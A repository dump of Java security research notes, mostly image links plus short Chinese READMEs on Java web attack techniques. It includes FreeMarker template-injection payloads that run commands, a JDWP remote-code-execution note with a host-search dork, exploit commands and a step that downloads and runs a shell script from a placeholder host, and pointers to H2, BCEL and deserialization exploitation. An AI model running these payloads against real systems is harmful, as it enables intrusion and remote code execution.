--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png
--------------------------------------------------------------------------------
/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png
--------------------------------------------------------------------------------
/javaee/base64/README.md:
--------------------------------------------------------------------------------
1 | attack scenario
2 | ```
3 | Shiro 利用 Base64 解码差异绕 WAF
4 | ```
5 |
6 | - [Java下奇怪的Base64](http://www.lmxspace.com/2021/01/06/Java%E4%B8%8B%E5%A5%87%E6%80%AA%E7%9A%84Base64/)
7 |
--------------------------------------------------------------------------------
/javaee/bcel/README.md:
--------------------------------------------------------------------------------
1 | 前置基础
2 | ---
3 |
4 |
5 | 相关利用
6 | ---
7 |
8 | ### BCEL 编码/解码工具 X-BCELCode.jar
9 |
10 | - BCEL编码/解码,常用于构造反序列化漏洞payload的场景
11 | ```
12 | # java version "1.8.0_201"
13 | java -jar .\X-BCELCode.jar
14 | ```
15 | 
16 |
17 | ```
18 | java -jar .\X-BCELCode.jar --encode .\src\Evil.class
19 | java -jar .\X-BCELCode.jar --decode '$$BCEL$$$l$8b$I$A$A$A$'
20 | ```
21 | 
22 |
--------------------------------------------------------------------------------
/javaee/bcel/X-BCEL.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/bcel/X-BCEL.jar
--------------------------------------------------------------------------------
/javaee/design pattern/README.md:
--------------------------------------------------------------------------------
1 | > 记录代码阅读过程中遇到过的设计模式
2 |
3 | #### 1、访问者模式(Visitor Pattern)
4 |
5 | ```
6 | 访问比较复杂的数据结构,不去改变数据结构,而是把对数据的操作抽象出来,在“访问”的过程中以回调形式在访问者中处理操作逻辑。
7 | ```
8 |
--------------------------------------------------------------------------------
/javaee/expression language/ognl/README.md:
--------------------------------------------------------------------------------
1 | - [0x02 表达式语言 OGNL](https://pen4uin.github.io/post/22-10-03-confluence-el-injection-via-ognl/#0x02-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E8%AF%AD%E8%A8%80-ognl)
2 |
--------------------------------------------------------------------------------
/javaee/expression language/spel/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/javaee/java servlet/README.md:
--------------------------------------------------------------------------------
1 | > attack vector
2 |
3 | - 权限绕过: getRequestURI() + getServletPath()
4 | - 权限绕过: RequestDispatcher methods
5 | - 条件竞争
6 |
--------------------------------------------------------------------------------
/javaee/jdbc/h2/README.md:
--------------------------------------------------------------------------------
1 | > RCE
2 |
3 | - JNDI
4 | - RUNSCRIPT + evil.sql (本质: CREATE ALIAS AS)
5 | - CREATE ALIAS AS
6 | - CREATE TRIGGER
7 |
--------------------------------------------------------------------------------
/javaee/jdbc/mysql/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/javaee/jdbc/postgresql/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/javaee/template engine/freemarker/README.md:
--------------------------------------------------------------------------------
1 | ```
2 | <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}
3 |
4 | <#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}
5 | ```
6 |
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211108103208739-16395903238381.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211108103242423.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211108103517041.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211108103833882.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211108103854979.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211214204856501.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211215225939460.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211215232032453-16395903266652.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211215232209050-16395903359864.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211215233015850.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211215234351142-16395903291333.png
--------------------------------------------------------------------------------
/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/template engine/groovy/source-analysis.assets/image-20211216014448682.png
--------------------------------------------------------------------------------
/javaee/template engine/velocity/README.md:
--------------------------------------------------------------------------------
1 |
2 | [0x02-模板引擎-velocity](https://pen4uin.github.io/post/22-10-01-confluence-ssti-via-velocity/#0x02-%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E-velocity)
3 |
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20211108002026565.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20211108002026565.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220119163614488.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220119163614488.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220119164953772.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220119164953772.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220119172348169.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220119172348169.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220120170955546.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220120170955546.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220120171337998.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220120171337998.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215152128829.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215152128829.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215152156507.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215152156507.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215152949881.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215152949881.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215153502354.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215153502354.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215153915204.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215153915204.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215154950054.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215154950054.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215155935625.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215155935625.png
--------------------------------------------------------------------------------
/javaee/vulnerability/img/image-20220215162206252.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/javaee/vulnerability/img/image-20220215162206252.png
--------------------------------------------------------------------------------
/javaee/vulnerability/jdwp rce.md:
--------------------------------------------------------------------------------
1 | > Created:2021/10/17 17:54
2 |
3 | ### 漏洞简介
4 | JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java调试而设计的通讯交互协议,它定义了调试器和被调试程序之间传递的信息的格式。说白了就是JVM或者类JVM的虚拟机都支持一种协议,通过该协议,Debugger 端可以和 target VM 通信,可以获取目标 VM的包括类、对象、线程等信息,在调试Android应用程序这一场景中,Debugger一般是指你的 develop machine 的某一支持 JDWP协议的工具例如 Android Studio 或者 JDB,而 Target JVM是指运行在你mobile设备当中的各个App(因为它们都是一个个虚拟机 Dalvik 或者 ART),JDWP Agent一般负责监听某一个端口,当有 Debugger向这一个端口发起请求的时候,Agent 就转发该请求给 target JVM并最终由该 JVM 来处理请求,并把 reply 信息返回给 Debugger 端。
5 |
6 | ### 漏洞复现
7 |
8 | FoFa Dork:
9 |
10 | > banner="JDWP-Handshake"
11 |
12 |
13 | 
14 |
15 |
16 | ```
17 | python2 .\jdwp-shellifier.py -t 62.x.x.x -p 8000 --cmd "ping xxxxx.dnslog.cn -c2"
18 | ```
19 |
20 | 
21 |
22 | 此时,找到相应WEB网站访问
23 |
24 | 
25 |
26 | 
27 |
28 | 触发
29 |
30 | 
31 |
32 | 测试截图
33 |
34 | 
35 |
36 | ### 漏洞利用
37 |
38 | - 反弹shell
39 | - jdwp-shellifier.py -t 目标IP -p 端口 --cmd "wget http://x.x.x.x/x.txt -O /tmp/x.sh"
40 | - jdwp-shellifier.py -t 目标IP -p 端口 --cmd "bash /tmp/x.sh"
41 |
42 | - 写入webshell
43 |
44 | ### 漏洞防御
45 |
46 | - 关闭JDWP端口,或者JDWP端口不对公网开放
47 | - 所以内网渗透时可以注意一下 +_+
48 | - 关闭Java的debug模式(开启该模式对服务器性能有影响)
49 |
50 |
51 | 参考资料
52 | - https://github.com/IOActive/jdwp-shellifier
53 |
--------------------------------------------------------------------------------
/mechanism/databinding/README.md:
--------------------------------------------------------------------------------
1 | 相关漏洞
2 | - [ ] Spring Framework CVE-2022-22965
3 | - [ ] Spring Framework CVE-2010-1622
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/32e2b52cedb344d5be39ed880c30e134.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/41a2f918a49c41b7ac62521bafa778cb.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/4a81b196a3ef4e4b9e172a4a52e1acaf.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/851600c7f7064b3880112b15398e90cc.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/93afd2976fce487d85794a41f6700d65.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/96fe4f4cf45e4c5f90be821790f7f886.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/b10c111ecfdc47dbae548a7399f87d6c.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/b3b9433c7dbc44f996f5b3f62dddab12.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/b942e530762240f5958692b6ce15a035.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/dbda66813d5f44b5907b320492185242.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/dcf784b91c1549b3bb3a38dee5f28511.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/eaaa5eee918f49238b531632a1b3eb76.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/f9f936a04b554b6482f90ec8e5b020c7.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220108230455188.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220108230455188.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220108231345721.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220108231345721.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110010458402.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110010458402.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110010946944.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110010946944.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110011301258.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110011301258.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110011637089.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110011637089.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110012516629.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110012516629.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110013037847.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110013037847.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110013253942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110013253942.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110014102136.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110014102136.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110014358909.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110014358909.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110014625513.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110014625513.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110015047912.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110015047912.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110015312401.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110015312401.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110015633886.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110015633886.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110020122733.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110020122733.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110020346569.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110020346569.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110020750595.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110020750595.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110021423356.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110021423356.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110021553549.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110021553549.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110022127739.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110022127739.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110022835890.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110022835890.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110023158446.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110023158446.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110023509406.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110023509406.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110023906262.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110023906262.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110024153294.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110024153294.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110025245969.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110025245969.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110030044227.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110030044227.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110031401317.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/istoliving/JavaSec/c5b02696cd0551c53464881baa699f92f006232d/mechanism/serialization/fastjson/note/img/image-20220110031401317.png
--------------------------------------------------------------------------------
/mechanism/serialization/fastjson/note/img/image-20220110031605273.png:
--------------------------------------------------------------------------------
